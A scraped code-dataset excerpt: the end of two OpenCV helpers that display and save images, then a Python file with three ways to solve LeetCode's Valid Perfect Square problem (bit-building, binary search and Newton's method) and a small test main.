    Blocks until any key is pressed, then destroys all windows.
    '''
    try:
        cv2.imshow(name, image_instance)
        # waitKey(0) blocks indefinitely until a key press.
        cv2.waitKey(0)
        cv2.destroyAllWindows()
    except Exception as e:
        # Best-effort display: report the error instead of raising.
        print(e)
def save_image_opencv(image_instance, img_name):
    '''
    Save an OpenCV image instance to ``img_output/<img_name>.jpg``.

    The output directory is created on demand via create_folder().
    '''
    create_folder('img_output')
    # Output format is fixed to JPEG by the hard-coded extension.
    target_name = os.path.join('img_output',
                               "{}.jpg".format(img_name))
    try:
        cv2.imwrite(target_name, image_instance)
    except Exception as e:
        # Best-effort save: report the error instead of raising.
        print(e)
22,099 | 7e3006e20ed8c437be9b193898a1f799dc6f4f24 | # 367 Valid Perfect Square
class Solution(object):
    """Three ways to decide whether num is a perfect square (LeetCode 367).

    All divisions use // so the arithmetic stays integral on Python 3 as
    well (on Python 2, // and / are identical for ints).
    """

    def isPerfectSquare(self, num):
        """
        :type num: int
        :rtype: bool

        Build the integer root bit by bit: find the largest power of two
        whose square fits in num, then greedily add smaller powers of two.
        """
        powerOfTwo = []
        base = 1
        while base * base <= num:
            powerOfTwo.append(base)
            base *= 2
        root = base // 2  # largest power of two with root*root <= num
        if root * root == num:
            return True
        for i in range(len(powerOfTwo) - 2, -1, -1):
            sq = (root + powerOfTwo[i]) * (root + powerOfTwo[i])
            if sq == num:
                return True
            elif sq < num:
                root += powerOfTwo[i]
        return False

    def isPerfectSquare2(self, num):
        """Binary search for an integer mid with mid*mid == num."""
        low, high = 1, num
        while low <= high:
            mid = low + (high - low) // 2
            sq = mid * mid
            if sq > num:
                high = mid - 1
            elif sq < num:
                low = mid + 1
            else:
                return True
        return False

    def isPerfectSquare3(self, num):
        """Newton's method on integers, converging to floor(sqrt(num))."""
        if num == 1:
            return True  # bug fix: the original returned 0 (falsy) for 1
        t = num // 2  # or, init t = num, and remove the num == 1 check
        while t * t > num:
            t = (t + num // t) // 2
        return t * t == num
def main():
    """Smoke-test the bit-building implementation on a few known values.

    Uses parenthesized single-argument print so the file runs unchanged on
    both Python 2 (where it is a print statement with a parenthesized
    expression) and Python 3.
    """
    sol = Solution()
    #print(sol.isPerfectSquare(0))       # True
    print(sol.isPerfectSquare(1))        # True
    print(sol.isPerfectSquare(4))        # True
    print(sol.isPerfectSquare(9))        # True
    print(sol.isPerfectSquare(6))        # False
    print(sol.isPerfectSquare(2 ** 30))  # True


if __name__ == '__main__':
    main()
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.